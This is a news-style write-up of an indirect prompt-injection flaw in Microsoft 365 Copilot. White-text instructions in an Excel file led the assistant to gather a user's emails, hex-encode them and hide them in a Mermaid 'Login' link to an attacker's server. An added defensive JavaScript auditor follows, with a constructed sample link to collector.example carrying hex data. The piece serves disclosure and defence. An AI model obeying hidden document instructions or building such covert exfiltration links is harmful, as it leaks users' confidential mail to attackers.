Data Leak in Microsoft Copilot: Emails Exfiltrated via Hidden Mermaid Diagram
A novel vulnerability was discovered in Microsoft 365 Copilot that permitted covert exfiltration of user data via an innocuous-looking Mermaid flowchart. The flaw lay in Copilot’s handling of a specially crafted document: the assistant could execute concealed instructions and leak confidential information to an attacker by abusing the diagram-rendering and CSS features.
The exploit began when Copilot ingested a document containing an indirect prompt injection—malicious directives camouflaged as ordinary text. During its summarization routine, the assistant dutifully followed these hidden instructions: it searched the corporate environment for the user’s recent emails, encoded fragments of them in hexadecimal, and embedded the resulting data into a “login diagram” written in Mermaid. Visually, the diagram presented itself as a benign “Login” button adorned with a padlock, ostensibly prompting authorization to reveal content. In truth, the diagram concealed a CSS-styled hyperlink pointing to the attacker’s server, into which the encoded email snippets were injected. When a user clicked the button, the data was transmitted to the adversary and could subsequently be decoded.
Mermaid is a markup language for diagrams that supports CSS styling; Copilot’s ability to render such diagrams inline within the chat created the covert channel exploited for the leak. The researcher who demonstrated the issue methodically chained actions—from harvesting emails to generating a clickable artifact that exfiltrated data to a Burp Collaborator endpoint. The proof-of-concept showed that upon clicking the faux login, a frame briefly appeared in the Copilot window displaying the attacker’s server response before vanishing, while the user perceived merely a mock Microsoft sign-in page.
To maximize plausibility, the researcher used indirect prompt injection by embedding hostile instructions as white text inside an Excel file alongside benign data. Copilot, processing the file, interpreted those instructions as a privacy prompt and offered a “login” to view the purported content—thereby combining hidden-instruction injection with Mermaid-based exfiltration.
Microsoft acknowledged the issue and issued a patch that disabled interactive behavior in generated diagrams. After the update, hyperlinks within Mermaid objects are no longer actionable, effectively closing the leak vector. The researcher verified the remediation and commended the company’s rapid response; however, no bounty was awarded under MSRC’s bug-bounty program because Copilot was not officially within the program’s scope.
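As an added illustration of the mitigation described above (not code from the researcher or Microsoft), the JavaScript below audits model-generated Mermaid source before it is rendered: it lists outbound URLs, flags long hexadecimal runs inside them, and strips anchors and click lines. The function names, the example hosts and the 32-character hex threshold are assumptions made for this example.

```javascript
// Added example (not from the article): audit LLM-generated Mermaid before rendering.
// Hosts, sample text and the 32-hex-character threshold are constructed assumptions.
const URL_RE = /https?:\/\/[^\s"'<>)\]]+/gi;
const HEX_RUN_RE = /[0-9a-f]{32,}/gi;                 // 16+ encoded bytes in one run
const CLICK_RE = /^[ \t]*click[ \t]+\S+.*$/gim;       // Mermaid "click <node> ..." lines
const ANCHOR_RE = /<a\b[^>]*>([\s\S]*?)<\/a>/gi;      // HTML anchors inside node labels

// Decode a hex run so an analyst can see what would have left the tenant.
function decodeHex(hex) {
  const even = hex.length % 2 ? hex.slice(0, -1) : hex;
  return even.match(/../g).map((b) => String.fromCharCode(parseInt(b, 16))).join("");
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Returns every outbound URL found, whether it carries a hex payload,
// and a copy of the diagram with anchors, click lines and URLs removed.
function auditMermaid(source) {
  const findings = (source.match(URL_RE) || []).map((url) => {
    const runs = url.match(HEX_RUN_RE) || [];
    return { url, host: hostOf(url), hexPayload: runs.length > 0, decoded: runs.map(decodeHex) };
  });
  const sanitized = source
    .replace(ANCHOR_RE, "$1")
    .replace(CLICK_RE, "")
    .replace(URL_RE, "[link removed]");
  return { findings, sanitized, blocked: findings.some((f) => f.hexPayload) };
}

// Constructed sample: a "Login" node whose link carries hex-encoded text.
const SAMPLE_TEXT = "Subject: Q3 budget (constructed)";
const SAMPLE_HEX = Array.from(SAMPLE_TEXT, (c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const SAMPLE = [
  "flowchart TD",
  `  A["<a href='https://collector.example/l?d=${SAMPLE_HEX}'>Login</a>"]`,
  "  style A fill:#0078d4,color:#fff",
  '  click A "https://docs.example/help"',
].join("\n");

const report = auditMermaid(SAMPLE);
console.log(report.blocked, report.findings.map((f) => f.host), report.findings[0].decoded);
```

The sanitized output keeps the node label and styling, so the diagram still renders as a static picture with nothing to click.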